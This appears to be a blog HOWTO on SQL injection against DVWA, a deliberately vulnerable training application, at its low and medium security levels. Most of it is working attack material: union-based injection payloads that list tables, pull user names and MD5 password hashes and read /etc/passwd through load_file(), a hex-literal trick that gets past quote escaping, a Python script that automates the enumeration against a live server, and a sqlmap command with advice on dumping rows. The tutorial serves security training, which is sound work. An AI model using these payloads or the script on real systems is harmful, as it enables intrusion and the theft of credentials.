Friday, August 02, 2013

HOWTO : DVWA SQL Injection

Security level = low

In DVWA 1.0.7/1.0.8 the low-level source builds the query as
SELECT first_name, last_name FROM users WHERE user_id = '$id'
with no escaping at all. The injected value therefore has to close the single quote and comment out the quote DVWA appends after it (# starts a MySQL line comment). Type the payloads into the form field; if you paste them into the address bar instead, encode # as %23, otherwise the browser drops it as a URL fragment.

99' or 1=1 #
- will display all the records

99' or 1=1 union select 1,2,3 #
- will display the "The used SELECT statements have a different number of columns" error message: the original query selects two columns (first_name, last_name), so the UNION half must select two as well

99' or 1=1 union select 1,2 #
- no error message; displays all records plus one extra row showing 1 and 2

99' or 1=1 union select null,null #
- same result; null is the safer probe because it is compatible with any column type

99' or 1=1 union select version(),database() #
- will display the version of MySQL and the database name - dvwa

99' or 1=1 union select null, user() #
or
99' or 1=1 union select user(), null #
- will display the current database user (user@host); either column can carry it

99' or 1=1 union select null, table_name from information_schema.tables #
- will display all the table names the database user can see, across every database; add where table_schema=database() to limit the list to dvwa

99' or 1=1 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name='users' #
- will display the users table column list, one table/column pair per row (0x0a is a newline; it renders as one because DVWA prints each row inside <pre>)

99' or 1=1 union select null, concat(first_name,0x0a,password) from users #
- we are looking for the users table's first_name and password; the password column holds unsalted MD5 hashes

99' or 1=1 union select null,@@datadir #
- will display the MySQL data directory

99' or 1=1 union all select null,load_file('/etc/passwd') #
- will display the content of /etc/passwd. This only works when the database user has the FILE privilege, the file is readable by the mysqld process and secure_file_priv does not restrict the path; otherwise load_file() silently returns NULL and the row shows an empty surname.

Security level = medium

The medium-level source passes the id through mysql_real_escape_string() and then builds
SELECT first_name, last_name FROM users WHERE user_id = $id
without quotes around $id. The escaping only backslashes quote characters, and the payloads below contain none, so the same union attack works unchanged and no closing # is needed.

99 or 1=1
- will display all the records

99 or 1=1 union select 1,2,3
- will display the "The used SELECT statements have a different number of columns" error message

99 or 1=1 union select 1,2
- no error message; displays all records plus one extra row showing 1 and 2

99 or 1=1 union select null,null
- same result; null is compatible with any column type

99 or 1=1 union select version(),database()
- will display the version of MySQL and the database name - dvwa

99 or 1=1 union select null, user()
or
99 or 1=1 union select user(), null
- will display the current database user

99 or 1=1 union select null, table_name from information_schema.tables
- will display all the table names the database user can see

99 or 1=1 union select null, concat(table_name,0x0a,column_name) from information_schema.columns
- the where table_name='users' filter from the low level fails here because mysql_real_escape_string() turns each quote into \' and breaks the query; one option is to list every column of every table and look for the users rows

or

99 or 1=1 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name=0x7573657273
- where 0x7573657273 is the hex encoding of "users"; MySQL treats a 0x literal as a string, and it contains no quote for the escaping to touch

99 or 1=1 union select null, concat(first_name,0x0a,password) from users
- we are looking for the users table's first_name and password

99 or 1=1 union select null,@@datadir
- will display the MySQL data directory. The load_file() step from the low level works here too if the path is hex-encoded the same way, e.g. load_file(0x2f6574632f706173737764) for /etc/passwd, subject to the same FILE privilege and secure_file_priv conditions.
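The script below is an added example for this page, not code from the original post or from DVWA. It automates the union steps of both sections above in Python: it builds the id value with the quote breakout and trailing # for low and the unquoted form for medium, hex-encodes string literals so they survive mysql_real_escape_string(), probes the column count with a growing list of nulls, and parses the <pre> rows DVWA prints. The query shapes it assumes are those of the DVWA 1.0.7/1.0.8 sqli source; the base URL, cookie and SAMPLE_HTML are constructed, and it only contacts a server when a URL and cookie are given on the command line, otherwise it runs against the canned sample.

```python
#!/usr/bin/env python3
"""Automate the union-based DVWA SQLi enumeration (low and medium).

Added example for this page, not code from the original post or from DVWA.
Assumed query shapes (DVWA 1.0.7/1.0.8 sqli source):
  low:    ... WHERE user_id = '$id'   (no escaping, id is single-quoted)
  medium: ... WHERE user_id = $id     (mysql_real_escape_string(), unquoted)
Base URL, cookie and SAMPLE_HTML are constructed for the offline demo.
"""
import re
import sys
import urllib.parse
import urllib.request

COLUMN_ERROR = "The used SELECT statements have a different number of columns"


def hex_literal(s: str) -> str:
    """MySQL 0x.. string literal, e.g. 'users' -> 0x7573657273.
    It carries no quote character, so mysql_real_escape_string() leaves it alone."""
    return "0x" + s.encode("utf-8").hex()


def build_id(level: str, union_body: str) -> str:
    """Value to send as id= for 'union select <union_body>' at the given level."""
    if level == "low":
        # Close the single-quoted literal, then comment out DVWA's own closing quote.
        return f"99' or 1=1 union select {union_body} #"
    if level == "medium":
        if "'" in union_body or '"' in union_body:
            raise ValueError("medium escapes quotes; wrap strings with hex_literal()")
        return f"99 or 1=1 union select {union_body}"
    raise ValueError(f"unknown level {level!r}")


def build_url(base: str, id_value: str) -> str:
    """urlencode so the trailing '#' is sent as %23 instead of being lost as a fragment."""
    return base + "?" + urllib.parse.urlencode({"id": id_value, "Submit": "Submit"})


def fetch(base: str, cookie: str, id_value: str) -> str:
    """Send one payload to DVWA with the session/security cookie and return the HTML."""
    req = urllib.request.Request(build_url(base, id_value), headers={"Cookie": cookie})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8", "replace")


def extract_rows(html: str):
    """Parse DVWA's '<pre>ID: ..<br>First name: X<br>Surname: Y</pre>' blocks.
    DOTALL because concat(.., 0x0a, ..) puts a newline inside the Surname field."""
    return re.findall(r"First name: (.*?)<br>Surname: (.*?)</pre>", html, re.DOTALL)


def find_column_count(get, level: str, max_cols: int = 10) -> int:
    """Grow 'null,null,..' until MySQL stops complaining about the column count.
    `get` maps an id value to response HTML, so the probe can run offline."""
    for n in range(1, max_cols + 1):
        if COLUMN_ERROR not in get(build_id(level, ",".join(["null"] * n))):
            return n
    raise RuntimeError("no column count up to %d worked" % max_cols)


def enumerate_users_columns(get, level: str):
    """The information_schema.columns step, hex-encoding 'users' so the same
    payload works at both levels. Only rows carrying the 0x0a separator are
    union rows; the rest come from the base query (or 1=1 returns everyone)."""
    body = ("null, concat(table_name,0x0a,column_name) from information_schema.columns "
            f"where table_name={hex_literal('users')}")
    rows = extract_rows(get(build_id(level, body)))
    return [tuple(surname.split("\n", 1)) for _, surname in rows if "\n" in surname]


# Constructed stand-in for a DVWA response: two real rows from the base query
# plus two union rows (first_name is NULL there, so "First name:" is empty).
SAMPLE_HTML = (
    "<pre>ID: ...<br>First name: admin<br>Surname: admin</pre>"
    "<pre>ID: ...<br>First name: Gordon<br>Surname: Brown</pre>"
    "<pre>ID: ...<br>First name: <br>Surname: users\nuser_id</pre>"
    "<pre>ID: ...<br>First name: <br>Surname: users\nfirst_name</pre>"
)


def fake_get(id_value: str) -> str:
    """Offline DVWA: the null probe errors unless it has exactly two columns;
    the information_schema query returns the sample listing."""
    if "information_schema" in id_value or id_value.count("null") == 2:
        return SAMPLE_HTML
    return f"<pre>{COLUMN_ERROR}</pre>"


if __name__ == "__main__":
    if len(sys.argv) == 3:  # usage: dvwa_union.py <base url> "<cookie string>"
        base, cookie = sys.argv[1], sys.argv[2]
        level = "low" if "security=low" in cookie else "medium"
        get = lambda v: fetch(base, cookie, v)
    else:
        level, get = "low", fake_get
    print("columns in base query:", find_column_count(get, level))
    for table, column in enumerate_users_columns(get, level):
        print(f"{table}.{column}")
```

Against a real instance run it as dvwa_union.py http://localhost/dvwa/vulnerabilities/sqli/ "security=medium; PHPSESSID=<your session id>"; the cookie has to belong to a logged-in browser session, and the level is picked from the security= value in it.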

sqlmap for Security = low

./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns

- the cookie carries both the security level and a logged-in session, so copy the PHPSESSID value from your own browser; --string="Surname" tells sqlmap which text appears only in a true response; -T users --columns lists the columns of the users table. Add --dump to retrieve the rows (the password hashes) once the columns are known.

For Security = medium the same command works with security=medium in the cookie.

That's all! See you!